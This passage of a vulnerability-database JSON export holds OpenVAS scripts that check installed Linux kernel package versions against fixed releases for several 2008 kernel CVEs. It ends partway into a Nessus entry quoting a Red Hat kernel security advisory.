isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:56:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358"], "description": "Check for the Version of kernel", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870042", "href": "http://plugins.openvas.org/nasl.php?oid=870042", "type": "openvas", "title": "RedHat Update for kernel RHSA-2008:0519-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2008:0519-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n * A security flaw was found in the Linux kernel memory copy routines, when\n running on certain AMD64 systems. If an unsuccessful attempt to copy kernel\n memory from source to destination memory locations occurred, the copy\n routines did not zero the content at the destination memory location. This\n could allow a local unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n \n * Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n 64-bit emulation. This could allow a local unprivileged user to prepare and\n run a specially crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data. (CVE-2008-0598, Important)\n \n * Brandon Edwards discovered a missing length validation check in the Linux\n kernel DCCP module reconciliation feature. This could allow a local\n unprivileged user to cause a heap overflow, gaining privileges for\n arbitrary code execution. (CVE-2008-2358, Moderate)\n \n As well, these updated packages fix the following bug:\n \n * Due to a regression, "gettimeofday" may have gone backwards on certain\n x86 hardware. This issue was quite dangerous for time-sensitive systems,\n such as those used for transaction systems and databases, and may have\n caused applications to produce incorrect results, or even crash.\n \n Red Hat Enterprise Linux 5 users are advised to upgrade to these updated\n packages, which contain backported patches to resolve these issues.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-June/msg00021.html\");\n script_id(870042);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0519-01\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\");\n script_name( \"RedHat Update for kernel RHSA-2008:0519-01\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358"], "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870042", "type": "openvas", "title": "RedHat Update for kernel RHSA-2008:0519-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2008:0519-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n * A security flaw was found in the Linux kernel memory copy routines, when\n running on certain AMD64 systems. If an unsuccessful attempt to copy kernel\n memory from source to destination memory locations occurred, the copy\n routines did not zero the content at the destination memory location. This\n could allow a local unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n \n * Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n 64-bit emulation. This could allow a local unprivileged user to prepare and\n run a specially crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data. (CVE-2008-0598, Important)\n \n * Brandon Edwards discovered a missing length validation check in the Linux\n kernel DCCP module reconciliation feature. This could allow a local\n unprivileged user to cause a heap overflow, gaining privileges for\n arbitrary code execution. (CVE-2008-2358, Moderate)\n \n As well, these updated packages fix the following bug:\n \n * Due to a regression, "gettimeofday" may have gone backwards on certain\n x86 hardware. This issue was quite dangerous for time-sensitive systems,\n such as those used for transaction systems and databases, and may have\n caused applications to produce incorrect results, or even crash.\n \n Red Hat Enterprise Linux 5 users are advised to upgrade to these updated\n packages, which contain backported patches to resolve these issues.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-June/msg00021.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870042\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0519-01\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\");\n script_name( \"RedHat Update for kernel RHSA-2008:0519-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~92.1.6.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358"], "description": "Oracle Linux Local Security Checks ELSA-2008-0519", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122573", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122573", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0519", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0519.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122573\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:24 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0519\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0519 - kernel security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0519\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0519.html\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~92.1.6.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~92.1.6.0.2.el5~1.2.9~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~92.1.6.0.2.el5PAE~1.2.9~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~92.1.6.0.2.el5debug~1.2.9~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~92.1.6.0.2.el5xen~1.2.9~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~92.1.6.0.2.el5~2.0.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~92.1.6.0.2.el5PAE~2.0.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~92.1.6.0.2.el5debug~2.0.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~92.1.6.0.2.el5xen~2.0.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:38:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3272", "CVE-2008-0598", "CVE-2008-3275", "CVE-2008-1673"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-bigsmp\n kernel-debug\n kernel-default\n kernel-kdump\n kernel-smp\n kernel-source\n kernel-syms\n kernel-vmi\n kernel-vmipae\n kernel-xen\n kernel-xenpae\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065920", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065920", "type": "openvas", "title": "SLES10: Security update for Linux Kernel (x86)", "sourceData": "#\n#VID slesp2-kernel-5565\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Linux Kernel (x86)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-bigsmp\n kernel-debug\n kernel-default\n kernel-kdump\n kernel-smp\n kernel-source\n kernel-syms\n kernel-vmi\n kernel-vmipae\n kernel-xen\n kernel-xenpae\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65920\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1673\", \"CVE-2008-3272\", \"CVE-2008-3275\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for Linux Kernel (x86)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vmi\", rpm:\"kernel-vmi~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vmipae\", rpm:\"kernel-vmipae~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.16.60~0.29\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T13:06:09", "description": "Updated kernel packages that fix several security issues and a bug are\nnow available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Alexey Dobriyan discovered a race condition in the Linux kernel\nprocess-tracing system call, ptrace. A local unprivileged user could\nuse this flaw to cause a denial of service (kernel hang).\n(CVE-2008-2365, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* It was discovered that the Linux kernel handled string operations in\nthe opposite way to the GNU Compiler Collection (GCC). This could\nallow a local unprivileged user to cause memory corruption.\n(CVE-2008-1367, Low)\n\nAs well, these updated packages fix the following bug :\n\n* On systems with a large number of CPUs (more than 16), multiple\napplications calling the 'times()' system call may have caused a\nsystem hang.\n\nRed Hat Enterprise Linux 4 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.", "edition": 29, "published": "2008-07-02T00:00:00", "title": "RHEL 4 : kernel (RHSA-2008:0508)", "type": "nessus", "bulletinFamily": 